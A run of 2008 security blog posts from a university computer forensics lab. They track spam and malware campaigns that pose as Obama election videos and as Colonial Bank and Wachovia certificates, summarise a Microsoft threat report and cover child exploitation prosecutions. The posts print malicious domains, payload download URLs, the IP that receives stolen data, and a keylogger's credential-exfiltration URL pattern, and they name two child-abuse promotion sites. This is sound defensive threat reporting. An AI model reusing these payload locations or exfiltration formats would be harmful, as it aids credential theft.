flashbill dot net
inc-rep dot biz
asapload dot com
theypay dot biz

playpokeronline-casinos dot com
gamble-poker-holdem dot com
texasholdem-vip dot com

None of the sites in this group are currently resolving.




208.72.171.* has only 4 domain names:

br-ladies dot com
ru-ladies dot com
kharkovblacklist dot com
uapeople dot com




208.72.172.* has 132 domain names. Most all of them have the word "sex" in the title of the domain name. Many of them have been used to fill blog comment and address books with "SEO spam" (Search Engine Optimization spam), such as the domain:

NicoleHDUncut dot com which has over 19,000 websites pointing back to it, mostly in comment spam.

Pornntube dot com
Sexntube dot com
Tubepornporn dot com
Just-sex-2008 dot com
Hot-girl2008 dot com
FtvHeavenFemme dot net
GoGetFreePorn dot com

clsoft dot net <== encryption software, makers of "cl secrets keeper" and "cl private disk"




208.72.175.* has 12 domain names:

dreamsservices dot com
FianceeOnline dot com
Rudreams dot com
Ukrainefiancee dot com
etc.

None of these sites are currently resolving




Is this the end of McColo? Probably not. Like the Intercage fiasco, we will probably see loud and public outcries of discrimination followed by mournful apologies and promises to do better, each accompanied with a short-lived resurrection, which will terminate again as soon as the new providers understand what sort of filth they are accomodating, and how the Neighbors (that's you and I, folks) feel about having this trash on OUR Internet.

Tuesday, November 11, 2008

Microsoft Reveals Malware and Spam Trends

This week Microsoft has released their "Microsoft Security Intelligence Report 5". Like the previous volumes, this report gathers spam and malware information gathered by Microsoft's security-related teams for one half year, in this case January through June 2008. The 150 page report is described as "An in-depth perspective on software vulnerabilities and exploits, malicious code threats, and potentially unwanted software, focusing on the first half of 2008".

The report shows that vulnerability disclosures by software vendors was down in 1H08, 4% less than 2H07 and 19% less than 1H07, however the percentage of vulnerabilities which were rated as "High" has increased 13%, so that 48% of all new vulnerabilities received a "High" threat rating from the Common Vulnerability Scoring System.

While we worry about vulnerabilities to hacking, one trend that is troubling is that more "data breaches" occurred due to Stolen Equipment (37.2%) than Hack Attacks (23%). We need to continue to stress proper data classification in all organizations, and then proper data handling based on that data classification.


Browser Vulnerabilities



Vista came out with high marks compared to its predecessor Windows XP. Microsoft vulnerabilities accounted for 42% of Browser exploits on XP computers, including 5 of the top 10 Browser exploits, but only 6% of the Browser Exploits on Vista were related to Microsoft products, or 0 of the top 10.

One very interesting trend revealed by the report is that hackers continue to target particular geographies. Chinese computers were twice as likely as American computers to be a victim of a Browser-based exploit -- in part because of Chinese-market toolbars which contained vulnerabilities, such as the BaoFengStorm vulnerability and the BaiduToolbar vulnerability. Chinese computers accounted for 48% of the browser based exploits, followed by 23% for American computers. Russian, Italian, British, Spanish, French, Turkish, German, and Korean trailed.

This would be an opportunity to stress the importance of timely installation of browser patches. Even though the report was for the first half of 2008, the top exploited browser vulnerabilities from the Microsoft family were:

MS06-014 (MDAC_RDS)
MS06-071 (MSXML_setRequestHeader)
MS06-057 (WebViewFolderIcon)
MS06-067 (DirectAnimation_KeyFrame)
MS06-055 (VML)

The top exploited non-Microsoft vulnerabilites for 1H08 were:

CVE-2007-0015 (Apple_Quicktime_RTSP)
CVE-2008-1309 (RealPlayer_rmoc3260_Console)
CVE-2007-3148 (Yahoo_WebcamViewer_ActiveX)
CVE-2006-5198 (WinZip_CreateNewFolderFromName)
CVE-2007-5601 (RealPlayer_IERPCtl)


Spam, Spam, Spam, and Spam



One great graphic in the report on page 67, shows the percentage of blocked spam by category.



(click to visit the Microsoft Exchange Hosted Services webpage to learn more)

Spam Categories (1H08 Microsoft Percentage given, and how we see the trend now at the UAB Spam Data Mine . . .)
(30.6%) Pharmacy-Sexual -- UP!
(20.9%) Other Pharmacy -- Slightly Down
(19.9%) Non-Pharmacy Product Ads -- DOWN
(9.6%) Stock -- DOWN - almost non-existent
(8.6%) Dating/Sexually Explicit Material -- SIGNIFICANTLY UP
(3.8%) Gambling -- UP!
(2.5%) Phishing -- Constant
(1.9%) Fraudulent Diplomas -- Down
(1.1%) 419 Scams -- Constant

To me this graphic could be labeled, "How Law Enforcement Should Spend Its Spam Fighting Resources". 51.5% of the spam Microsoft blocked during 1H08 was advertising pills! Whoever wants to take that on, please shoot me an email. We want to help. gar@cis.uab.edu


Malware


The most prevalent malware family is described in the report as being "not especially notable from either a technical or a social-engineering perspective, Win32/Zlob deserves attention due to the sheer magnitude and persistence of the threat". The malware family has lead the pack in number of infections since 1H07, and it continues to be removed by Microsoft security products more than twice as often as any other threat - around 9 million times in the first half of 2008.

Rather than recreate the entire geographic report, I thought it would be interesting to show the great difference between the Cyber Threat Experience in different geographies according to the Microsoft data.

In the United States, the top threat category was "Trojan Downloaders and Droppers" - those tiny files often encountered as "drive by infectors" on webpages whose only purpose is to download and execute additional commands. In the US, this accounted for 45.7% of the threat landscape, but in Brazil and China it was only 6.5%, while in Germany it was 39.5%. (NOTE: This is not saying 45.7% of US machines had a Trojan dropper -- this is saying 45.7% of the machines which came to Microsoft's attention as having been infected had a Trojan dropper on them.)

In the United States, only 8.4% of the threat landscape in 1H08 was made up of machines that had a Backdoor installed on them. But in Korea 14.9% of compromised machines had a Backdoor, and in Italy the number was 16.8%!

We'll run through the other categories, comparing the United States to China, Brazil, Germany, and "The World":

Trojan/Dropper:
US (45.7%) China (6.5%) Brazil (6.5%) Germany (39.5%) World (31.7%)

Other Trojans:
US (30.7%) China (22.2%) Brazil (8.2%) Germany (23.2%) World (23.9%)

Adware:
US (21.1%) China (8.3%) Brazil (9.7%) Germany (25.7%) World (20%)

Other Potentially Unwanted Software:
US (23.6%) China (43.8%) Brazil (11.6%) Germany (24%) World (25%)

Worms:
US (5.5%) China (10%) Brazil (11.6%) Germany (3.7%) World (11.3%)

Backdoors:
US (8.4%) China (9.9%) Brazil (3.7%) Germany (8.8%) World (9.2%)

Password and Monitoring Tools
US (2.5%) China (23.4%) Brazil (62.1%) Germany (1.7%) World (8.5%)

Viruses:
US (1.7%) China (3.1%) Brazil (2.3%) Germany (2%) World (3.3%)

Spyware:
US (1.5%) China (3.8%) Brazil (.5%) Germany (.7%) World (1.8%)

Exploits:
US (1.6%) China (.3%) Brazil (.1%) Germany (.8%) World (1%)



Another Key -- how many machines were found to be infected in the US vs. other parts of the world? That is, how many computers had SOMETHING removed by the Malicious Software Removal Tool?

United States 2H07 (8.9%) 1H08 (11.2%) +25.5%
Brazil 2H07 (13.2%) 1H08 (23.9%) +81.8%
China 2H07 (4.7%) 1H08 (6.6%) +41.1%
Germany 2H07 (4.4%) 1H08 (5.3%) +19.7%

One question about what those numbers mean though -- is this an indication that computers in the US are twice as likely to be infected as computers in Germany? Or is this an indication that computers in the US are twice as likely to be running the Malicious Software Removal Tool than computers in Germany?

Specific Geographies


The second half of the report is dedicated to giving specific numbers of computers for which Microsoft tools detected and cleaned various categories, which answers the question immediately preceding.

Some key findings in our chosen "comparison countries":

Brazil

"The threat landscape in Brazil is clearly dominated by malware. The top four families in Brazil are all malware families". In Brazil, 1,294,084 machines had "Other Trojans" removed from them, while 246,470 machines were infected by "Worms".

The Top Families in Brazil were:
Win32/Bancos - 894,666 infections (a "banking Trojan", capturing banking credentials and targeting specifically Brazilian banks, in some cases able to alter transactions)
Win32/Banker - 359,933 infections (a "banking Trojan")
Win32/Rjump - 130,488 infections (a "USB-jumper" Worm)

China

32.5% of the computers in China are infected with "Other Potentially Unwanted Software", which can't be categorized as adware, spyware, or malware, but is still probably criminal - such as rogue security software which is purchased from criminals and has no effect on the installed computer. Almost 700,000 computers in China had Password Stealers installed on them, with Win32/Frethog and Win32/Ceekat being the biggest installations.

Only 1 of the worldwide Top 10 malware families is present in China. (Win32/Rjump, the USB jumper that was so prevalent in Brazil ranked #7 in China).

Germany

More than 500,000 computers in Geramny had a Trojan/Dropper installed. Malware rate has increased 19.7% in Germany since 2H07. Adware was Germany's #2 threat, with 327,000 computers having Adware installed, which is a 79.6% increase over 2H07. Zlob was the top "Dropper" with 427,563 installs cleaned, while ZangoSearchAssistant was the top Spyware, with 130,770 installs removed.

United States

11.2% of US computers had software cleaned by the Malicious Software Removal Tool. This is a 38% increase over 2H07. 7,044,340 computers had a Trojan/Dropper, while 5,014,874 computers had an "Other/Trojan". 3.5 Million had "Other Potentially Unwanted Software", 3.3 Million had "Adware" and 1.3 Million computers had a backdoor. 847,972 were infected with a Worm, and 265,038 had Password Stealers active.

The "Other Trojan" numbers account for a 52.6% increase from 2H07.

Monday, November 10, 2008

Election Malware and Obama Pill Ads?

Just a quick post to update the situation we described in our previous posts that we are now thinking of as Election Malware Round One and Election Malware Round Two. Round One was the Obama Acceptance Speech video and Round Two was the McCain video. Technically, I guess that means we are currently looking at Round Two B, since the webpage hasn't changed - we just have a fresh batch of domain names.


Election Malware: Round Three


We made contact over the weekend with a real live human at Bizcn.com, who terminated all the domains listed above. Unfortunately, the spammer created new ones and this morning (10NOV08) at 7:52 AM we began to see his latest round of spam. In the first three hours of this spam campaign, the spam is evenly split between three domains created last night:

- miteodemo.com
- oirerbio.com
- demovideons.com

All three domains use the nameserver ns1.vistausan.com, which was also freshly registered last night at bizcn.com.

Computers which are currently hosting proxy redirectors for the domains above also provided redirection services for some of the "Round two" domain names. Some examples currently hosting would be:

118.219.111.107
190.47.161.2
221.184.68.214
89.36.135.102
91.90.229.209

But these are "fluxing" - they will change over the course of the hours as we wait for bizcn.com to shut down these newest domains and their nameserver domain. The shutdown request, in Chinese and English, was sent just now (10:40 AM Central Time)

Barack Sex Video malware


The only other piece of malware we are seeing delivered via election headlines is a very well detected trojan claiming to be a Barack Obama sex video. The great majority of products detect this malware at VirusTotal.com.

The porn video attachment name we are seeing most often is "zeland-01.zip".

Michelle Obama's Name used in Pill Spam


Why anyone would think that email recipients would buy Viagra after reading headlines like these is beyond my comprehension. Two heavily spammed subjects today used to sell Canadian Pharmacy pills are tied to Michelle Obama's name.

All of these 20 domain names were seen advertised in spam using the subject "Bush kills Michelle Obama":

bxoaxcs.cn
cpknetj.cn
cvmovzf.cn
fihithm.cn
hddbzqq.cn
imvbokv.cn
ixwewyi.cn
kycsgsf.cn
lrlbbgf.cn
pagegim.cn
ppnbokc.cn
rornzxl.cn
rzbopdh.cn
rzrsaak.cn
szosojb.cn
teqixyb.cn
ticewyt.cn
umcaxtx.cn
wjqsclb.cn
wplbhdi.cn

These 26 domains names were all used in spam with the subject line "Michelle Obama nude":

aojeyer.cn
cnrogvy.cn
dlyumlv.cn
dvrujfi.cn
fqosaeq.cn
gohbrtf.cn
iemokpg.cn
ihyefos.cn
ixwewyi.cn
kuxulne.cn
kxhoyed.cn
kzinwkm.cn
mmaagwd.cn
oaleqte.cn
ocbibxf.cn
rnjonlg.cn
rzrsaak.cn
sujidbk.cn
syootqj.cn
tomnhac.cn
uqpnjrn.cn
uwkajlr.cn
wjqsclb.cn
xyynwye.cn
zgmnvfe.cn
zyuunvw.cn

Each of those domain names actually forwards to another domain name when visited, which sells Canadian Pharmacy pills. Spammers use this technique to remove their spam from website orders from the domains they control, because some affiliate programs actually do refuse payment from those who can be shown to be spamming. By using this forwarding technique, spammers can claim their domains were NOT used in spam messages.

Friday, November 07, 2008

Election Malware Targets Sore Losers - McCain Video Loads Virus

We reported on Wednesday morning that Obama's historic victory was being used by cyber criminals in a spam campaign which attempted to trick email readers into watching a video of Obama's acceptance speech. Clicking the email link took readers to a website which seemed to have a video, but which prompted users to install "Adobe_Flash9.exe", which was not a video player upgrade, but actually a computer virus.

Today the spammer's have decided to take a more negative spin on their spam campaign. While "round one" of the malware seemed to try to appeal to those who were happy that Obama had won, "round two" is trying to trick the Haters into infecting themselves. More than 450 emails have already been received at the UAB Spam Data Mine with such negative subject lines as these:

Barack Obama can lost presidents chair
Barack Obama can lost President's Chair
Barack Obama in Danger - McCain will fight for president post
Barack Obama president resignation - 23/7 News
From Billy Mccain
IMPEACH Barrack Obama | USA government news
McCain Lawmakers Impeach Obama
McCain Lawyers Want to Stop Obama
McCain said today: 'Impeach Obama'
McCain strike against Obama political way
McCain vs Obama - There is a higher potential for confrontation between opposing political forces
McCain want to stop Obama
Moms who voted for Obama
Obama faces impeachment
Obama Impeachment Resources: McCain Look at the Impeachment Process
Obama vs McCain 'Political Strike' May Undermine Labor Group
Scandal: Obama Resignation Letter
Scandal: Re-elections John McCain Will be a Dictator?
Scandal: Re-elections John McCain will defeat Barack Obama
Scandal: Re-elections McCain will win
Scandal: Re-elections Obama: McCain Will Close With Attacks
Scandal: Re-elections Why John McCain will keep fighting
Scandal: Re-elections Why McCain Will Win
The Impeachment of new president Obama
Video: Obama post-resignation speech
Why MccAin Want to Stop Obama From president vacancy?
WScandal: Re-elections hich John McCain will show up to debate?


The website looks like this: (Click the image for a larger version)




As before, the domain names are all newly registered with in China with the Registrar Bizcn.com. The domain names now are:

baraokl.com
oritrsunwart.com
preibrsu.com
serensy.com

Visiting any of the webpages will cause the same "pop-up" which claims that an update is needed to the "Adobe Media Player". Its NOT the same executable that was being used Wednesday morning, but a "re-packing" of the same malware. In other words, it does the same thing, but its still going to need new anti-virus signatures to detect it.

The virus this time around is

File size: 25173 bytes
MD5...: 642a588272e9fe723fb2f1dd8fccede5

Here's a link to the VirusTotal report which shows 22 of 36 AV products currently detect this version of the malware.

Students studying computer forensics at UAB have analyzed this version of the malware and confirmed that the stolen data is sent to the same Ukrainian computer address as the original Obama acceptance speech video and the recent Colonial Bank Digital Certificate malware, 91.203.93.57.

We've sent a request for cooperation for shutdown to the abuse address of record for that IP, abuse@uatelecom.com.ua (good luck, right?)

The malware is hidden on the computer with the name: \9129837.exe and invoked whenever Internet Explorer is active on the computer.

Stolen userids and passwords are sent to the Ukrainian computer using strings that follow this pattern:

http://%s%s?user_id=%.4u&version_id=%s&passphrase=%s&socks=%lu&version=%lu&crc=%.8x
URL: sniffer_ftp_%s
ftp_server=%s&ftp_login=%s&ftp_pass=%s&version=%lu
URL: sniffer_pop3_%s
pop3_server=%s&pop3_login=%s&pop3_pass=%s
URL: sniffer_imap_%s
imap_server=%s&imap_login=%s&imap_pass=%s
URL: sniffer_icq_%s
icq_user=%s&icq_pass=%s

The packer used to make it more difficult to analyze the malware is called "FSG".

Bottom line - don't click on links in email. If you DID click on this link, you need very badly to check out your computer for potential malware.

Thursday, November 06, 2008

Yesterday's Obama Spammer Now Imitates Colonial Bank

In yesterday's blog, we talked about Obama spam spreading a virus. In that attack there were five domain names, all registered in China on Bizcn.com, being used to download a computer program which would steal your passwords and send them to criminals.

Today we have a new spam campaign which uses five domain names, all registered in China on Bizcn.com, being used to download a computer program which would steal your passwords and send them to criminals.

Both of the groups of five domains used a nameserver which was located on the IP address 69.162.111.11 (which is in Dallas, Texas).

When you visited the webpage yesterday, a pop up box asked you to download a video player. Today when you visit one of the Colonial webpages, a pop up box asks you to download a digital certificate.

Yesterday we received over 500 copies of the Obama spam with various subjects.

Today we've received over 300 copies of the Colonial Bank spam with subjects including:Colonial Bank - authorized users performing appropriate functions
Colonial Bank Warning: services specific high-risk geographical areas.
Colonial Bank - Display of Information
Colonial Bank Warning: system disables passwords that haven't been used by a customer in 90 days.
Colonial Bank Warning: subject to monitoring and validation for authenticity and appropriateness.
Colonial Bank Treasury Services
Colonial Bank Warning: terminate your Internet banking session
Colonial Bank Warning: Electronic requests received over the Internet
Colonial Bank has developed an update for log in page
Colonial Bank also provides extensive information regarding identity theft prevention
Colonial Bank would like to announce latest update
Colonial Bank Warning: access the Bank's servers.
Colonial Bank Warning: software designed to protect against inappropriate requests.
Colonial Bank security # latest patches and updates installation.
Colonial Bank recommend that you use fraud prevention procedures
Colonial Bank Update.
Colonial Bank - Network Security and Monitoring
Colonial Bank - your password will never be displayed on your computer screen
Colonial Bank Warning: retrieving web pages or sending inquiries
Colonial Bank security # Ensure that your operating system has all latest patches and updates installed.
Colonial Bank Alert: SERVER UPDATE.
Colonial Bank recommend that you use security update
Colonial Bank - data sent over the encrypted connection has been altered in transit.
Colonial Bank has developed a Fraud Prevention Checklist
Colonial Bank recommend to review your account security
Colonial Bank Security and Identity Protection Newsletter
Colonial Bank Warning: prevent access to online banking from an IP network
Colonial Bank has developed special file protection
Colonial Bank Warning: ur Internet banking system encrypts stored password files
Colonial Bank Commercial Customer Service
Colonial Bank has developed new free protection tool
Colonial Bank - all information sent between a client and a server encrypted
Colonial Bank Warning: initial registration
Colonial Bank would like to inform you security updates
Colonial Bank security # Ensure that your operating system updated.
Colonial Bank Alert - Update.
Colonial Bank has developed a new 128 bit sofware
Colonial Bank security # apply updates
Colonial Bank - providing a high degree of confidentiality.
Colonial Bank News - security development
Colonial Bank - effort to limit access to its servers
Colonial Bank Java Update Includes Security Fixes - Security Fix.
Colonial Bank Warning: using the Secure Sockets Layer (SSL) protocol.
Colonial Bank Customer Warning.
UPDATE ALERT CONFIGURATION Colonial Bank.
Colonial Bank - Secure Data Transfer
Colonial Bank would like to inform you
Colonial Bank - the user and the server are in a secure environment.
Colonial Bank would like to inform you lates development
Colonial Bank Online server update.
Colonial Bank Warning: Your Password, and certain other private information
Colonial Bank has developed new anti-Fraud feature
Colonial Bank Update Alert.
Colonial Bank Security Response Center (MSRC) : UPDATE.
Colonial Bank Warning: termination of Inactive Connections
Colonial Bank Emergency Alert System.
Colonial Bank Connection Security
Colonial Bank upgrade warning.
Colonial Bank Warning: allowing only the traffic that is necessary to send acceptable data requests
Colonial Bank Warning: if you are not actively using the system.
Colonial Bank Warning: this is accomplished by filtering Internet traffic
Colonial Bank Update - News.
Colonial Bank would like to stop fraud practice
Colonial Bank - these actions may include the implementation of restrictions
Colonial Bank - Data traveling between the user and the server is encrypted
Colonial Bank Warning: suspicious or potentially harmful activity
Colonial Bank Time Warner Security - Customer Service.
Colonial Bank Installation and Upgrade Warning.
Server Update Services Colonial Bank.
Colonial Bank has developed serious protection
Colonial Bank Urgent Customer Alert: "Joomla!" Security Update.
Colonial Bank - Other Security Measures
Colonial Bank WindowsXP/2000 customers Attention!
Colonial Bank - Security Fix.
Colonial Bank Warning: the sending software
Colonial Bank Guards and Protects Your Information
Colonial Bank would like to make you aware of online fraud
Colonial Bank - Our Internet banking system
Colonial Bank Security
Colonial Bank - an encrypted SSL connection required
Colonial Bank is committed to providing you with a convenient, safe and secure online banking
Colonial Bank Warning: we also monitor Internet traffic
Colonial Bank - takes several measures.
Visit a Colonial Bank Financial Center
Colonial Bank Services
Colonial Bank Warning: Electronic requests are filtered through a combination of computer hardware and software
Colonial Bank would like to open new security features
Colonial Bank Warning: automatically determining
Colonial Bank - an encrypted SSL connection is equipped with a mechanism for detecting tampering
Colonial Bank recommend that you use updated browser
Colonial Bank recommend that you use 128 bit file
Colonial Bank Regular Update Alert.
Colonial Bank Customer Support - Security Updates.

Here is today's webpage:



The domain names used today are:

coloneldi.com/security.php
gdieuntso.com/security.php
porentud.com/security.php
reteinr.com/security.php
rutriyn.com/security.php

Each of these domains was registered today (November 6, 2008) on Bizcn.com.

Visiting the Colonial pages above drops ColonialSETUP.exe

VirusTotal (17/36)

http://www.virustotal.com/analisis/9dfd058ab879365aa719e4a0055b2b46

File size: 3369 bytes

MD5...: 60e39dd91cd4676c70d4ee844eb5a6c7

The phase one malware makes connection to the following URL to download
the phase two malware:

chload.com/u1.exe

chload.com was registered TODAY on Register.com

the nameserver for chload.com is ns1.ldern.com

That is also the nameserver for:

customlod.com
upgradell.com
solecokes.com
lodnew.com

which have all ALSO been used to download Phase Two malware for Digital
Certificate spam.

The second phase malware (u1.exe) was also analyzed by VirusTotal.

http://www.virustotal.com/analisis/a0c5718489e7022da2f5bf35ef03adc8

It showed a 21/36 detection rate:
File size: 25161 bytes
MD5...: 6a1e70482b86500229ebdc99b13792ba

u1.exe installs itself as "comctl32.dll" and includes root kit and
keylogging technology. I have not had a chance yet to see where the
keylogged data is sent.

A request to terminate chload.com and ldern.com has been sent to
register.com.

A request to terminate the following domains has been sent to bizcn.com.

coloneldi.com
gdieuntso.com
porentud.com
reteinr.com
rutriyn.com

Wednesday, November 05, 2008

Computer Virus masquerades as Obama Acceptance Speech Video

Less than twelve hours after President-Elect Obama's historic acceptance speech, computer criminals have already crafted a malware attack based on the speech. The UAB Spam Data Mine has observed more than 300 spam messages which invite email readers to view the speech with a spam message that looks like this:

Barack Obama Elected 44th President of United States

Barack Obama, unknown to most Americans just four years ago, will become the 44th president and the first African-American president of the United States.
Watch His amazing speech at November 5!

Proceed to the election results news page>>

2008 American Government Official Website
This site delivers information about current U.S. Foreign policy and about American life and culture.



The spam subject lines include:

A new president, a new congress ...
Barack Obama wins
Can Obama win popular vote but lose election?
Did Obama Win Yet?
Election 2008: Time lapse of U.S. counties
Election Center 2008 - Election Results
Election Night Results
Fear of a Black President
New president's
Obama win an Electoral College majority
Obama win Defined by Race
Obama win preferred in world poll
Obama win sets stage for showdown
Obama Wouldnt Be First Black President
Obama's Win Reshapes the Race
Priorities for the New President
Priorities for the New President - TIME
The new President's cabinet?
USA Election 2008 Results
Will American Voters Elect a Black President
World Welcomes Obama's Win

The Sender of the email pretends to be one of:

news@cnn.com
news@usatoday.com
news@online.com
news@c18-ss-1-lb.cnet.com
news@president.com
news@unitedstates.com
news@bbc.com


using sender names such as:
2008 president center
Election results
Elections center
Election Results center
President election results

There are five different websites which are used to host the fake website, each of which looks exactly like this:



The domain names used in this attack are:

bfiinwach.com - registered November 4th, BizCN.com
gerimumsoe.com - registered November 4th, BizCN.com
lopbiuemis.com - registered November 4th, BizCN.com
vcoenutrmsi.com - registered November 4th, BizCN.com
wconlinenrue.com - registered November 4th, BizCN.com

(the domain spritsonline.net is also owned by this criminal and is used to host the NameServer for the other five domains.)


The spam message sends users to the page "president.htm" which claims that you need a new Adobe_flash9.exe player in order to view the video.


The virus has been reported to VirusTotal.com, where it was first reported at:

11.05.2008 17:24:35 (CET)

Currently 14 of 36 anti-virus products represented at VirusTotal have detection for this version of the malware, which is a keylogger in a family sometimes called "SnifULA".

The virus file is 31232 bytes in size, and has the MD5 value: 47c86509a78dc1edb42f2964bea86306

This is the same keylogger family which has been behind all of the Digital Certificate bank malware that we have reported to you on so many occasions previously, including yesterday's story on the malware pretending to be a merger letter regarding Wachovia and Wells Fargo.

As evidence of that, we offer the fact that the five domains above are all being hosted on a fast flux network, and that many of the compromised home computers in that network have also hosted the domains for yesterday's Wachovia/WellsFargo malware.

Student Malware Analysts in the UAB Computer Forensics department have analyzed the malware and indicate that the stolen login credentials are being sent to the Ukraine. The virus steals userids and passwords, and posts them to this IP address:

91.203.93.57

IP Location: Ukraine Ukraine Pool For Co-location Customers
IP Address: 91.203.93.57
Blacklist Status: Clear
Whois Record

inetnum: 91.203.93.1 - 91.203.93.128
netname: ZHITOMIR-NET
descr: pool for co-location customers
country: UA
admin-c: ML7676-RIPE
tech-c: ML7676-RIPE
status: ASSIGNED PI
mnt-by: UATELECOM-MNT
source: RIPE # Filtered

person: Mark Liberman
address: Kiev, Ukraine
e-mail:
phone: +380963801326
nic-hdl: ML7676-RIPE
source: RIPE # Filtered

Our friend Dan Clemens put one of those Chinese-registered domain names in a Fast Flux Tracker that he runs over at Packet Ninjas. During a one hour sample, the domain shifted between these IP addresses:

85.178.195.97 - Germany (alicedsl.de)
86.61.25.118 - Slovenia
87.14.145.40 - Italy
91.134.32.34 - Bulgaria
78.51.119.191 - Germany (alicedsl.de)
218.162.48.180 - Taiwan
79.117.203.200 - Romania (rdsnet.ro)
83.24.1.90 - Poland (tpnet.pl)
85.178.200.3 - Germany (alicedsl.de)
90.183.68.7 - Czech Republic (iol.cz)
83.24.21.128 - Poland (tpnet.pl)
87.207.9.23 - Poland (chello.pl)
79.114.224.222 - Romania (rdsnet.ro)
80.193.151.216 - UK (blueyonder.co.uk)



As always, we recommend that you do not follow links received in email, but rather type the name of a reputable news website in your browser if you would like to see the news.

ICE: Operation Predator - Solving Intertwined Child Porn cases

After this blog recently praised Spain for their work fighting Child pornography I was enlightened to the excellent work of the US Immigration and Customs Enforcement (ICE) and their Operation Predator.

Operation Predator is taking the time to track down child sex offenders, not just in the United States, but around the world. The Operation Predator FactSheet has some good facts and stats, such as the fact that in its first four years, ICE has lead to the arrest of 10,700 child predators nationwide! The Operation Predator News Site lists 29 cases just from October of this month!

A case sentenced yesterday in San Antonio, Texas, will illustrate how intertwined some of these investigations have shown to be. The particular case is an FBI arrest, but you'll see the Operation Predator tie in.

Richard Fleming was sentenced to 20 years after pleading guilty to two counts of possession of child pornography. The plea bargain allowed alleged travel from Texas to Illinois to have sex with underaged boys to be left out of the case. The 45 year old computer security expert will serve "lifetime house arrest" after his release, and will be forbidden to possess pornography, or to use a computer without permission of a federal probation officer. Fleming has more than 24 years experience in computer security, including working in the Air Force's Air Intelligence Agency Technology Demonstration Center at Lackland Air Force Base, and co-founding a security and risk management company called Digital Defense Inc in San Antonio in 1999.

Fleming's name has come up in two other cases - that of Charles Burt, an Illinois resident sentenced to 100 years for creating and distributing images of young boys in pornographic acts and that of William Martin of Beaver Dam, Wisconsin.

Charles Burt was the administrator of a website for pedophiles called "Starkids". Burt's troubles began in 1997 when he traveled to Ottawa to develop pictures of nude boys aged 5 and 7. An employee in the photo shop contacted the police, who in turn contacted the Department of Children and Family Services. The five year old testified that he had been touched inappropriately by Burt, and that he had witnessed Burt performing a sex act on a 4 year old boy. Burt was a registered foster parent in Illinois and would at times have legal custody of wards of the state. The charges were dropped at that time, as the photographs were admittedly nude but not found to be pornographic.

Interest in Burt was re-opened after the FBI arrested Beaver Dam, Wisconsin resident William Martin. Martin ran a sex ring where adults would pay to travel to Wisconsin to have sex with children that he recruited for the purpose. The children were often recruited at flea markets and fairs where Martin would sell trinkets and toys as a way to gain access to young boys. When Martin was arrested, he claimed to have the names of 300 other pedophiles in his "buddy list" in Yahoo Chat. Martin would ultimately be convicted and sentenced to 50 years in prison.

“ICE and our law enforcement partners have succeeded in taking a group of child molesters off the streets for decades. Our message to those who contemplate such crimes is this: We will not stand by as you prey on the most vulnerable among us. We will find you, prosecute you, and incarcerate you.”
-- Brian Falvey, the Resident Agent-in-Charge in ICE's Wisconsin office


Some of the places Martin would meet people are unfortunatley still in operaton today, such as www.boychat.org and freespirts.org which both exist to promote "boylove" (aka the rape of children).

The Press Enterprise ran an investigative report called Children for sale: Nationwide sex ring's reach included Riverside after Riverside police Officer Adam James Brown became another of those convicted from Martin's "buddy list". Brown had paid Martin $3,970 to meet several young boys for sex. The boys were sometimes paid in cash ($100) or other times were taken shopping for items such as a new PlayStation II.

At the time of the 2004 story, this map was listed (click for larger version):



Some of those since sentenced have included:

Joel Kline, 42, of Beaver Dam, Wisconsin was convicted of two counts of aggravated sexual abuse with children and two counts of travel with intent to engage in a sexual act with a juvenile. He was sentenced to two life terms in prison and three 360-month terms.

Adam Brown, 32, formerly a police officer in Riverside, Calif., was convicted of travel with intent to engage in a sexual act with a juvenile. He was sentenced to 365 months in prison.

Robert Hornyak, 60, of Milwaukee, Wis., was convicted of receiving and distributing child pornography and sentenced to 78 months in prison.

Kurt Sandvig, 44, of Kansas City, Mo., was convicted of travel with the intent to engage in a sexual act with a juvenile. He was sentenced to 360 months in prison.

Two others, from the map above, were ultimately sentenced after being arrested by ICE agents in Michigan as part of "Operation BuddyList":

Guy Lundrum, was sentenced to 19 years in prison for molesting 5 children, as young as 18 month old, after being arrested by Michigan ICE agents following a tip from the National Center for Missing and Exploited Children.

Brian Urbaniwiz, of Saginaw, Michigan, was sentenced to "4 to 20" years for "communicating to commit a crime" and for "35 to 60 years" for molestation of his own children, including a 12 year old, and 9 year old twin sons.

This case and the other cases resulting from Operation BuddyList reveal the disturbing truth that some adults will go to great lengths to exploit and molest children," said Brian M. Moskowitz, special agent-in-charge of the ICE Detroit Office of Investigations. "While we cannot give back the innocence to those who were abused and exploited, we can make sure that justice is served. The great cooperative efforts of the Detroit area local, state and federal law enforcement and prosecuting agencies involved in this case, helped ensure that justice was indeed served on behalf of these child victims."

Tuesday, November 04, 2008

More Merger Malware Wachovia Wells Fargo

Today I received a message from Robert K. Steel, the President and CEO of Wachovia Bank. Actually I received several hundred messages from various imaginary people who all pointed me to websites where I could download a "digital certificate" that was necessary to move my Wells Fargo accounts to Wachovia.

Here is the body of that webpage "CEO Message":


CEO MESSAGE

November 04, 2008

Dear Clients, Shareholders and Friends,

The Federal Reserve has approved the proposed merger with Wells Fargo, and we expect to close the transaction by the end of this year, subject to Wachovia shareholder approval. The integration of our two companies will surely take longer, as it will be a very methodical, thoughtful process that puts customers first.

In the meantime, we remain focused on serving our customers. There will be no immediate changes to your accounts or your relationship with Wachovia. Wachovia and Wells Fargo are committed to keeping you informed of any changes well in advance. For now, please continue to install updated security software.

Follow the below mentioned process to reissue your personal Digital Certificate :

1. Download digital certificate: WachoviaCertificate.exe

2. Double Click on the downloaded file.

3. Mention your new Certificate Signature Request in the text box.

Thank you for being with Wachovia.

Sincerely,

Robert K. Steel
President and CEO



If you are a regular at this blog, you'll know this Digital Certificate family of malware, which last week targeted the Bank of America acquisition of LaSalle Bank. We were able to ask our friends at Register.com to terminate the second-stage malware domain last week, but no sooner was it terminated, than the criminals began to use a new second-stage, this time:

customlod.com/c.exe

The new malware, "WachoviaCertificate.exe", is a small 3.2KB file which serves only to download and execute the "c.exe" file mentioned above. (We've asked Register.com to terminate that domain as well.)

Some of the fake Wachovia sites involved in this scam, which all use the path "message.php", include:

resultins.com
nuerbtow.com
winnerresult.com
barakobwin.com
uehnsoe.com

Here's a screen shot of the fake malware. Please don't be fooled!





Gary Warner
UAB Computer Forensics
home of the UAB Spam Data Mine

Monday, November 03, 2008

MS08-067: New RPC Worm from China

Sorry, gentle reader, this blog post is for the Geeks. Bottom line for non-geeks.

MAKE SURE YOU HAVE YOUR WINDOWS SERVERS PATCHED WITH MS08-067.

Non-geeks, quit reading here. Sorry.

We've received word of a new "in the wild" worm based on the MS08-067 "out of cycle" security patch released by Microsoft on October 23rd.

